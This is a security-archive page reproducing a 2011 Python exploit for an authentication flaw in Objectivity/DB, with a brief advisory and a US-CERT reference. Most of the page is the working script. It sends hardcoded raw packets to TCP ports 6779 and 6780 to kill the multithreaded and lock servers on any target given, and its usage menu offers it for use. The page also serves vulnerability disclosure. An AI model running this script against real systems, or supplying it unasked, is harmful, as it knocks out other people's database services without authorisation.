Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25495
HistoryJan 18, 2011 - 12:00 a.m.

Objectivity/DB Lack of Authentication Remote Exploit

2011-01-1800:00:00
vulners.com
22

#!/usr/bin/python

obj.py

Objectivity/DB Lack of Authentication Remote Exploit

Jeremy Brown [0xjbrown41-gmail-com]

Jan 2011

"Objectivity, Inc. is a leader in distributed, scalable database technology.

Our patented data management engine and persistent object store is the enabling

technology powering some of the most complex applications and mission critical

systems used in government, business and science organizations today."

Objectivity/DB includes many different tools for administration. The

problem is, anyone can use these tools to perform operations on the host

running the lock server, advanced multithreaded server, and probably

it's other servers as well, without any authentication. This design flaw

puts the host running these servers at risk of potentially unauthorized

operations being performed on the system, locally or remotely.

This code demostrates a couple of the easiest operations to replicate

by hand, like killing the lock and am servers. The suite contains lots

of other admin tools that do various, more interesting tasks with the

Objectivity/DB, such as oobackup, oonewfd, oodeletefd, oodebug, etc…

Tested on Objectivity/DB 10 running on Windows

Fixed version: N/A, US-CERT coordinated the communication and released

a vulnerability note after the vendor did not provide additional feedback.

http://www.kb.cert.org/vuls/id/782567

import sys
import socket

kill_ooams=(
"\x0d\x03"+
"\x00"*5+
"\x02"+
"\x00"*3+
"\x19\xf0\x92\xed\x89\xf4\xe8\x95\x43\x03"+
"\x00"*15+
"\x61\x62\x63"+
"\x00"+
"\x31\x32\x33\x34"+
"\x00"*3+
"\x05\x8c"+
"\x00"*3+
"\x0d"+
"\x00"*4
)

kill_ools=(
"\x0d\x03"+
"\x00"*5+
"\x77"+
"\x00"*3+
"\x04\xad\xc4\xae\xda\x9e\x48\xd6\x44\x03"+
"\x00"*15
)

if len(sys.argv)<3:
print "Objectivity/DB Remote Exploit"
print "Usage: %s <target> <operation>"%sys.argv[0]
print "\nWhat would you like to do?\n"
print "[1] Kill the advanced multithreaded server"
print "[2] Kill the lock server"
print "For other operations, check out oobackup, oodebug, etc"
sys.exit(0)

target=sys.argv[1]
op=int(sys.argv[2])

if((op<1)|(op>2)):
print "Invalid operation"
sys.exit(1)

if(op==1):
port=6779
data=kill_ooams

if(op==2):
port=6780
data=kill_ools

cs=target,port

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)

sock.send(data)

sock.close()